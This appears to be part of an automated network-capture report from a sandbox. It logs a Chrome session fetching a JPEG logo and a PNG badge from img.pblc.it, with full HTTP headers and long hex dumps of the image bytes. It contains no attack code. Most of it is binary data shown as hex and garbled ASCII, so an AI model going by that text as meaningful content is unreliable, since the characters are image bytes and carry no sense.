                                                                                                                                                                                                        Data Ascii: padding:10px 0 10px 0" valign="top" align="center"><p style="width:100%;margin:0;padding:0;font-weight:700;display:block;line-height:1.5;font-size:34px;text-align:center;font-family:helvetica,arial,verdana,sans-serif;color:#122641">&nbsp; &nbsp;</
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1236INData Raw: 69 6e 67 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 2c 61 72 69 61 6c 2c 76 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 31 32 32 36 34 31 22 3e 26 6e 62 73 70 3b 20 26 6e 62 73 70 3b 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 3c 2f 74 61 62 6c 65 3e 0a 09 09 09 09 09 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 74 68 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 3c 2f 74 61 62 6c 65 3e
                                                                                                                                                                                                        Data Ascii: ing:0;font-weight:700;display:block;line-height:1.5;font-size:34px;text-align:center;font-family:helvetica,arial,verdana,sans-serif;color:#122641">&nbsp; &nbsp;</p></td></tr></tbody></table></td></tr></tbody></table></th></tr></tbody></table>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        19192.168.2.549764188.114.97.34436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC647OUTGET /i/600x315x9.coords.DO.25,038402457757297x0-74,9615975422427x100/7c758/66cd5c5f19c3010c7f1c2f4d_pdf-real-logo.jpg HTTP/1.1
                                                                                                                                                                                                        Host: img.pblc.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:03 GMT
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        cache-control: public, max-age=7200
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 14:21:48 GMT
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y91OhEkWVmPzBZzVj5bGys5zBrirmwrbQYMk97FA1L5moF7t3aREruDv%2Bufgzh4K1SMj6Ykb8TWLNZy5pwKEe70%2FN8q%2FFqHGqheykr%2FAHIK8Da9r57323QRlZUycCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615443d004225-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC698INData Raw: 37 64 31 34 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 32 20 37 39 2e 31 36 30 39 32 34 2c 20 32 30 31 37 2f 30 37 2f 31 33 2d 30 31 3a 30 36 3a 33 39 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52
                                                                                                                                                                                                        Data Ascii: 7d14JFIFExifII*/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:R
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 41 45 45 32 31 35 37 35 38 37 43 42 31 31 45 39 42 42 34 44 38 32 37 43 42 33 45 43 43 41 44 44 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 41 45 45 32 31 35 37 36 38 37 43 42 31 31 45 39 42 42 34 44 38 32 37 43 42 33 45 43 43 41 44 44 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff db 00 43 00 04 03 03 04 03 03 04 04 04 04 05 05 04 05 07 0b 07 07 06 06 07 0e 0a 0a 08 0b 10 0e 11 11 10 0e 10 0f 12 14 1a 16 12 13 18 13 0f 10 16 1f 17 18 1b 1b 1d 1d 1d 11 16 20 22 1f 1c 22 1a 1c 1d 1c ff db 00 43 01 05 05 05 07 06 07 0d 07 07 0d
                                                                                                                                                                                                        Data Ascii: eID="xmp.iid:AEE2157587CB11E9BB4D827CB3ECCADD" stRef:documentID="xmp.did:AEE2157687CB11E9BB4D827CB3ECCADD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>C ""C
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: f9 e5 07 f9 3d 71 d4 3e 77 51 ff 00 3c a0 ff 00 27 ae 3a 87 ce ea 3f e7 94 1f e4 f5 c7 50 f9 dd 47 fc f2 83 fc 9e b8 ea 1f 3b a8 ff 00 9e 50 7f 93 d7 1d 43 e7 75 1f f3 ca 0f f2 7a e3 a8 7c ee a3 fe 79 41 fe 4f 5c 75 0f 9d d4 7f cf 28 3f c9 eb 8e a1 f3 ba 8f f9 e5 07 f9 3d 71 d4 3e 77 51 ff 00 3c a0 ff 00 27 ae 3a 87 ce ea 3f e7 94 1f e4 f5 c7 50 f9 dd 47 fc f2 83 fc 9e b8 ea 1f 3b a8 ff 00 9e 50 7f 93 d7 1d 43 e7 75 1f f3 ca 0f f2 7a e3 a8 7c ee a3 fe 79 41 fe 4f 5c 75 0f 9d d4 7f cf 28 3f c9 eb 8e a1 f3 ba 8f f9 e5 07 f9 3d 71 d4 3e 77 51 ff 00 3c a0 ff 00 27 ae 3a 87 ce ea 3f e7 94 22 fe d3 d7 2b 7e c9 3f 37 99 fd ad ff 00 cf 28 89 5b 7f 6a 2b af ca 55 4e d6 94 ff 00 cf a8 72 2d fe d3 57 15 a5 93 dc 5c 8d ad 2b 35 ee 15 34 bb 56 13 af a8 dd 6c f2 93 4b
                                                                                                                                                                                                        Data Ascii: =q>wQ<':?PG;PCuz|yAO\u(?=q>wQ<':?PG;PCuz|yAO\u(?=q>wQ<':?"+~?7([j+UNr-W\+54VlK
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b 7b 99 f8 0f 81 bb d8 fa 8b 4d dc f3 6d 8b fb 99 f8 0f 81 bb d8 fa 8b 4d dd 4f 36 98 bf 17 46 7e 03 e1 6e c7 e9 54 6f 0e 9f ba be 6d b1 5f 73 3f 02 3e 1a ef 64 fd 43 a6 ee b5 53 57 78 a4 37 ba 53 f0 22 6c 5c 85 74 ed dd 35 5f b7 cf b9 d1 2c 4a d7 36 e9 4f 77 c8 a2 6d 5c 87 aa de d2 d3 d7 fb 7c 7a ca e6 d2 7b 35 63 24 97 c8 a6 ab 77 22 97 a7 c7 b1 54 7d b3 cd 38 4a 8d 45 9a 79 48 f1 44 d7 c4 b5 14 d5 13 9a ba 39 36
                                                                                                                                                                                                        Data Ascii: m{Mm{Mm{Mm{Mm{Mm{Mm{Mm{Mm{MmMO6F~nTom_s?>dCSWx7S"l\t5_,J6Owm\|z{5c$w"T}8JEyHD96
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 31 0a 6e 54 f3 8b 7d 46 57 4b 63 89 ad ef 0e d1 a7 47 6a 62 25 b9 7a 03 ab 8b 4c 02 ca 9b 95 28 a9 e4 9f 03 60 b1 a3 88 e6 e1 db 4b 6e 5c d4 57 31 12 c8 10 4a 87 a3 1c b2 46 4e 9a 62 39 30 35 5c e2 e7 2b 55 ae 67 c1 17 a9 88 59 aa 98 97 1d 54 a8 d9 77 92 df 81 94 94 a6 53 35 44 2e d3 62 17 14 ea 16 aa aa 25 76 2c c4 2b ca c8 b5 c2 78 74 9c ac 89 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1 3c 3a 4e 56 43 84 f0 e9 39 59 0e 13 c3 a4 e5 64 38 4f 0e 93 95 90 e1
                                                                                                                                                                                                        Data Ascii: 1nT}FWKcGjb%zL(`Kn\W1JFNb905\+UgYTwS5D.b%v,+xt<:NVC9Yd8O<:NVC9Yd8O<:NVC9Yd8O<:NVC9Yd8O<:NVC9Yd8O<:NVC9Yd8O
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 0e 33 68 64 e3 51 55 de 4f 0c 2d cd 52 85 4a 8c 62 13 e2 4a b4 9b 64 f2 4c 5d 5d 9c 77 71 27 91 37 56 79 2c f7 8c c1 4d 7c d7 29 53 4c a2 aa a3 f4 bd 72 ec 44 62 16 ea 5d 4e 8c b2 cb 34 57 44 67 aa 9b 76 62 e7 39 71 31 9c 16 d7 48 2c a5 0a b0 4e 4d 74 a3 cb aa d2 c5 c8 97 ab 49 ad af 43 72 26 89 6a 1e b7 35 49 56 ce bd 5b 8b 6a 4f 24 db dc 8d 43 53 a3 aa 8a b2 ed db af bd 14 de a2 28 b9 2c 2d 46 a5 4c 36 72 b7 ae 9a 6b 76 f3 cd 54 44 52 dd 6b b9 e3 4c 55 42 f4 54 e3 3e 5a 93 c9 f1 dc 5a b3 38 9c ae cc 45 51 c3 53 2f 6a d3 5a 57 18 0d c5 2a 55 aa 3d 9c f2 de cc e6 9f 59 c1 c9 a4 ef 16 ee d1 a9 a2 6a a6 1b 71 a2 9a 55 6b a4 d6 90 ad 19 c7 6d ae 19 99 cb 3a c8 aa 31 2e 1f b4 b6 4d 7a 5b b3 98 76 2a d3 d9 e0 b7 1e 98 af 89 e2 a6 62 39 4a e5 16 9c 53 e9 1c 18
                                                                                                                                                                                                        Data Ascii: 3hdQUO-RJbJdL]]wq'7Vy,M|)SLrDb]N4WDgvb9q1H,NMtICr&j5IV[jO$CS(,-FL6rkvTDRkLUBT>ZZ8EQS/jZW*U=YjqUkm:1.Mz[v*b9JS
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 55 bb b7 a6 f6 73 6f 72 35 ed 56 8f c3 e6 ef 9b b5 bd 54 5d a2 2d 57 2c 30 eb 56 b4 9c ad aa a6 9a dd bc c3 d7 d7 0d ee 29 a2 e4 78 94 ae d0 a1 e4 cd d7 8b cd f1 22 98 9a 79 bc 5a 9b d3 5c f0 32 3e ad b5 99 75 82 62 54 a1 56 72 54 93 cb 7b 3d fa 3d 74 f1 70 b5 ed bb b0 2d ea 74 f3 54 47 36 e2 68 a6 9b 5a 69 0d ad 39 29 c7 69 a5 d2 6c b6 ef e6 21 c4 36 86 ca b9 a5 aa 79 3b 54 de d2 f4 4c 85 13 13 0c 2c 57 89 c4 ab 4e 5d 65 53 0a e7 12 a4 d3 6f 71 0f 3c cf 35 d8 f0 28 cf 35 d8 e8 91 29 00 00 00 00 00 00 00 00 00 00 00 08 cf d5 62 53 1d 56 2f 39 8d 7f db 7f 42 9a bc b2 b9 6b d4 8f 77 9f 3a d3 f6 ba e7 be cd 1f 5f ea cb e9 4d dd fc 1a 7d 9d 26 f7 a0 f1 c7 56 7e c3 3a ea 1f 9c d3 ed 33 da 07 34 df bf 23 70 a8 73 48 76 1b 3d ae 8e 25 57 59 71 63 eb 32 6a 4a e0
                                                                                                                                                                                                        Data Ascii: Usor5VT]-W,0V)x"yZ\2>ubTVrT{==tp-tTG6hZi9)il!6y;TL,WN]eSoq<5(5)bSV/9Bkw:_M}&V~:34#psHv=%WYqc2jJ
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 96 bd 48 f7 79 f3 ad 3f 6b ae 7b ec d1 f5 fe ac be 94 dd df c1 a7 d9 d2 6f 7a 0f 1c 75 67 ec 33 ae a1 f9 cd 3e d3 3d a0 73 4d fb f2 37 0a 87 34 87 61 b3 da e8 e2 55 75 97 16 3e b3 26 a4 ae 08 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a ad 9e 92 62 32 b9 4c 66 13 ce 12 dc f8 11 e1 bc 75 4c d3 53 89 56 32 db ca 1c 0b d4 d1 10 f5 46 a2 31 cd cd b6 b7 c9 2d a7 c4 a2 b8 85 a8 bb c5 3c 92 ad 65 06 9b 8b ca 45 34 44 44 aa aa a9 88 cb 8d 1b 59 ae 32 cc bb 55 71 fa 59 a6 f5 59 45 c3 61 ef 2d cd 6b b3 7e 67 92 7f f1 dc 5b ce 54 c5 39 9c ac 6d b5 3d fc 0a a2 17 a2 e7 e9 cb ca 3b 19 ae 25 c8 4c 53 c4 b6 51 52 9a a3 01 08 00 00 00 00 00 00 00 00 00 00 00 0a b5 98 10 c8 8c 09 29 e5 b8 91 4f f9 29 74 a0 7e b0 85 dd aa c5 ad aa 5b d5 82 d8 92 e9 2d df a7 8e 9c 2e
                                                                                                                                                                                                        Data Ascii: Hy?k{ozug3>=sM74aUu>&@b2LfuLSV2F1-<eE4DDY2UqYYEa-k~g[T9m=;%LSQR)O)t~[-.
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 97 59 47 8b 6e 69 96 e5 ea 4f 4a 55 ee 15 4a 9d 49 66 f2 e9 66 cd a4 b9 c5 30 e1 9b cf b3 66 dd d9 aa 21 9a 1c b2 8e d7 59 9c a7 a3 47 aa ac 4e 08 cb 68 9a 91 4f 55 5c 77 96 e0 98 e6 9a 59 15 aa 54 00 00 00 00 00 00 00 08 cf d5 62 53 1d 56 2f 39 8d 7f db 7f 42 9a bc b2 b9 6b d4 8f 77 9f 3a d3 f6 ba e7 be cd 1f 5f ea cb e9 4d dd fc 1a 7d 9d 26 f7 a0 f1 c7 56 7e c3 3a ea 1f 9c d3 ed 33 da 07 34 df bf 23 70 a8 73 48 76 1b 3d ae 8e 25 57 59 71 63 eb 32 6a 4a e0 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 e9 b9 c9 35 c0 b7 5d 1c 52 98 8e 4e 54 2b 46 34 67 15 c5 26 5d f0 e6 29 23 35 55 10 d4 6d 74 dd 54 bc c6 e5 6d b4 f2 72 cb 23 5c d6 fd b5 3b 4e ea 4d 16 74 f1 54 b2 76 a2 34 6a 9e 15 6d 1b 87 05 b4 d6 79 e4 7a f6 7c 45 6d 4f 7d 36 9c 5c ab 82 25 9b
                                                                                                                                                                                                        Data Ascii: YGniOJUJIff0f!YGNhOU\wYTbSV/9Bkw:_M}&V~:34#psHv=%WYqc2jJ5]RNT+F4g&])#5UmtTmr#\;NMtTv4jmyz|EmO}6\%
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: b7 49 af 4f 99 d0 6f b2 2e a7 bd a9 a1 df 46 5b 66 fa 90 d6 37 9f f0 aa 6f a5 2e 6b 4b b8 be 86 e9 4f 47 ce 37 7d 49 f7 5e 87 04 44 12 3e 25 aa bc c2 48 bc 2a 00 00 00 00 00 00 00 04 67 ea b1 29 8e ab 17 9c c6 bf ed bf a1 4d 5e 59 5c b5 ea 47 bb cf 9d 69 fb 5d 73 df 66 8f af f5 65 f4 a6 ee fe 0d 3e ce 93 7b d0 78 e3 ab 3f 61 9d 75 0f ce 69 f6 99 ed 03 9a 6f df 91 b8 54 39 a4 3b 0d 9e d7 47 12 ab ac b8 b1 f5 99 35 25 70 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 51 da 91 6e b8 cc a2 65 cc b4 86 54 e4 5d 9f 29 3d 61 a9 fa eb a3 c9 69 0b ab 97 09 1a be ba 9f bf 2e bf ba 57 b3 a7 e0 65 2d 4a 62 3e 55 65 08 67 9e 51 32 7b 36 79 35 7d f2 d3 f0 55 35 32 9d f4 f9 18 4a 7c 37 19 5b b5 62 96 81 62 89 aa bc 34 fb 5f 98 a7 29 71 52 3b 46 9d b4 2e 66 a7 d0
                                                                                                                                                                                                        Data Ascii: IOo.F[f7o.kKOG7}I^D>%H*g)M^Y\Gi]sfe>{x?auioT9;G5%pBBQneT])=ai.We-Jb>UegQ2{6y5}U52J|7[bb4_)qR;F.f


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        20192.168.2.549763188.114.97.34436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC578OUTGET /i/300x0x8.f.DOST/x/created_in_publicate.png HTTP/1.1
                                                                                                                                                                                                        Host: img.pblc.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC689INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:03 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        cache-control: public, max-age=7200
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 14:50:45 GMT
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Age: 2792
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNSf29N4WWu4%2FqDQikPElDds8vXWRpstjmTgQc%2B3FNjpkCU9psydib2PCm0kUM%2BGvrRrC%2F%2Fbqm53AiPQDKKsNjcwq6m%2Bh8%2Bn6qegeM1ZW1RdeJVMfBSPmufyViab%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb6154439c44331-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC680INData Raw: 32 32 61 63 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 2a 08 06 00 00 00 09 53 66 dc 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 da e5 5d 7b 8c 9d c5 75 ff 9d ab ab d5 6a b5 dd 58 8e eb ba 96 e3 38 d4 72 5d ea 3a ae eb 00 01 43 1c 9e 01 32 73 79 3f 12 c2 cb 24 40 08 75 a1 b8 49 4a 91 e5 22 27 25 84 92 34 a1 a9 13 cc 3b 24 3c 0a be 33 40 09 81 84 38 06 1c 42 09 a5 ae 8b 5c d7 b1 2c cb 5a 59 96 65 59 ab 95 b5 5a dd d3 3f ee f9 dc f1 ec bc be bb 9b 4a 6d af b4 da dd fb 7d f3 38 f3 38 73 ce ef fc 66 86 00 34 98 b9 03 00 44 74 e4 6f ff 43 44 0d f7 7f f7 3d 37 5d ea bd 3a 9f a9 ce c7 97 31 27 6b 49 3b e4 f2 2c f9 3f 24 a3 5f e7 54 1d 63 bf 4b d3 f9 df 5b 6b fb 01 cc 03 f0 09 00 e7 02
                                                                                                                                                                                                        Data Ascii: 22acPNGIHDR,*SfpHYs+ IDATx]{ujX8r]:C2sy?$@uIJ"'%4;$<3@8B\,ZYeYZ?Jm}88sf4DtoCD=7]:1'kI;,?$_TcK[k
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 71 ff 1a cc 3c 8d 88 be 05 e0 12 00 cd 9c 55 95 b1 a8 72 8a ee 6d 00 57 01 d8 56 61 5b a9 c1 db 4b 5b 95 58 f8 bd 60 95 b9 7a 95 58 f6 53 29 ef ff f7 4f 23 e5 6f a7 4c e6 a3 cc b4 84 c9 97 ca 37 97 3e 87 01 94 82 f6 44 d4 48 d5 f7 88 f6 4e b8 9c 25 d6 5c 4e b6 5e ca 2d ad 47 ac 9d 7d d9 ad b5 0d 00 b3 00 3c c5 cc 9f 72 95 15 33 1f 51 36 ee df 95 e2 09 01 ef ee bb 1e 1e ea be b2 94 99 9f 67 e6 e5 d6 da 46 6c a5 0f fd b8 63 cf fd 5d 2a af fb 7f 2c ef d0 3b a1 3c 63 e5 c6 fa 32 96 a6 17 79 43 f2 fb f5 ce 95 1f 92 31 34 26 4b f3 2e ad 53 69 de 25 f2 26 35 7e 6a a2 e4 56 90 d2 7c 7d 85 58 ba 0a a5 26 7c c9 24 2f 51 b2 93 51 b6 93 51 b2 75 07 5f 0a 6c 0e d4 73 3a 80 ef 03 38 55 a2 7c 47 7e 88 e8 88 a2 71 ff f6 95 90 af d4 aa 77 dd b4 81 f2 e7 12 d1 0f 00 ac c8
                                                                                                                                                                                                        Data Ascii: q<UrmWVa[K[X`zXS)O#oL7>DHN%\N^-G}<r3Q6gFlc]*,;<c2yC14&K.Si%&5~jV|}X&|$/QQQu_ls:8U|G~qw
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: 13 a5 63 37 94 d6 5a 7b 37 80 db 9c af 1e 52 4a 5d e3 58 4d 7d 22 df 51 75 f2 e5 6a b7 db 33 89 e8 b5 0a c3 92 cf 55 d5 18 72 22 84 d3 01 cc 60 e6 bd 5a eb 43 29 9c d6 51 76 4d 71 1d c7 94 52 e3 39 2f c9 1f 57 12 51 6e 02 38 5c a5 8f 29 18 63 cc 00 33 bf 02 e0 38 a7 df af 57 4a 7d b7 74 9f ab 53 e7 7e a9 f3 58 a8 dd 8e 28 2c 63 cc 0c 00 4f 00 58 21 df 8d 01 38 28 69 a6 39 9d f0 0e 11 9d 5d ad b8 75 b6 4e e4 1a ac 8e 46 8f 59 1f c6 98 13 88 e8 8d ca 5d d1 5a b7 4a 00 d8 ba fb c3 9c 01 75 1f 11 7d 5e da e6 fa 56 ab 75 7f 6e 95 68 b7 db f3 01 fc 8b 28 ac 5d 4a a9 0f f5 5a 7e ee 99 31 e6 4b cc bc 2e 06 ae 27 c8 a1 1d b1 ac 1e 90 7c fa 01 dc 0b e0 5a 0f 68 df 45 44 2b 99 f9 d5 56 ab 05 63 cc 10 33 ff 14 c0 12 df b5 0c ad c2 12 31 3c 4b 6b 3d 1e 92 c1 5a bb 08
                                                                                                                                                                                                        Data Ascii: c7Z{7RJ]XM}"Quj3Ur"`ZC)QvMqR9/WQn8\)c38WJ}tS~X(,cOX!8(i9]uNFY]ZJu}^Vunh(]JZ~1K.'|ZhED+Vc31<Kk=Z
                                                                                                                                                                                                        2024-08-30 16:16:03 UTC1369INData Raw: c9 75 d4 c2 20 ae 55 28 02 e6 32 cf fd e7 55 fa 11 00 af ca c2 7e 82 58 39 d5 ab 73 98 f9 1e 63 cc b9 82 07 4f 08 80 78 96 6b 23 50 ce 04 25 d1 6e b7 97 12 d1 bd 00 a6 79 4a 66 98 88 f6 30 f3 00 11 cd 77 a8 10 e3 00 de 74 5c e0 cd 44 f4 10 80 cf 4b ba 9d 00 36 11 d1 bf 03 78 9f d0 13 16 3a 75 38 55 14 ef 26 19 cb ff 08 e0 d7 44 f4 65 0f 8b 7b 48 a0 81 aa af 86 1d 57 78 10 c0 83 8e 55 5e 45 15 37 03 d8 06 60 96 58 65 55 74 b4 4f e6 c4 e6 86 4c 9a 13 5d 77 38 b4 92 2b a5 46 01 9c 05 e0 fd cc fc 7e 00 7f e7 74 fe 34 66 5e 48 44 0b 01 fc 31 11 b5 99 f9 4a 66 5e e0 9a 82 c6 98 25 44 f4 0b 66 be 93 99 97 cb fb cb 00 7c 89 99 5f 33 c6 68 f1 a7 2b c1 a6 13 d1 f3 cc 7c 1f 11 69 66 5e 28 8d 77 26 33 af 03 f0 86 b5 76 85 d3 81 73 01 cc 73 34 fb a0 a4 f9 6d 87 93 34
                                                                                                                                                                                                        Data Ascii: u U(2U~X9scOxk#P%nyJf0wt\DK6x:u8U&De{HWxU^E7`XeUtOL]w8+F~t4f^HD1Jf^%Df|_3h+|if^(w&3vss4m4
